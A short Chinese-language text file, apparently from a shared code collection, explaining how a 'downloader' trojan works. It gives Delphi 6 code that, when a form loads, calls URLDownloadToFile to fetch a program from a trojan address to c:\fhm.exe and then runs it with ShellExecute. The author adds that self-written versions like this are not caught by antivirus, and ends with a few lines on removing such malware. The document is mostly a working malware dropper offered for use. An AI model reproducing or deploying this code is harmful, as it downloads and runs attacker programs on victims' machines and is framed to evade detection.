下载者原理.txt

来自「我收集的几个下载者代码 大家看看学习学习就好了别搞破坏哦」· 文本 代码 · 共 15 行

工作环境：Delphi6 
调用API： 
uses 
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, 
  Dialogs, StdCtrls, ExtDlgs, ShellAPI; 
调用的API函数： 
 ShellExecute 
URLDownloadTofile 
打开Delpihi，在窗体运行的那个过程（FORM1。CREAT）里写： 
 URLDownloadToFile (0, '木马地址', 'c:\fhm.exe', 0, 0  
 ShellExecute (0, 'Open', 'c:\fhm.exe', nil, nil, SW_SHOWNORMAL); 
  
就可以了。。。运行这个程序就会自动从木马地址下载一个程序到C盘下并命名为fhm.exe然后再运行了 

这种病毒都很简单，一般不会插入注册表，所以只要在安全模式下就可以杀掉，如果是个人编写（像我这样写，杀毒软件都不杀！）的话那就没办法了，不过个人编写自己专用的很少隐藏进程，这就需要各位手动判断了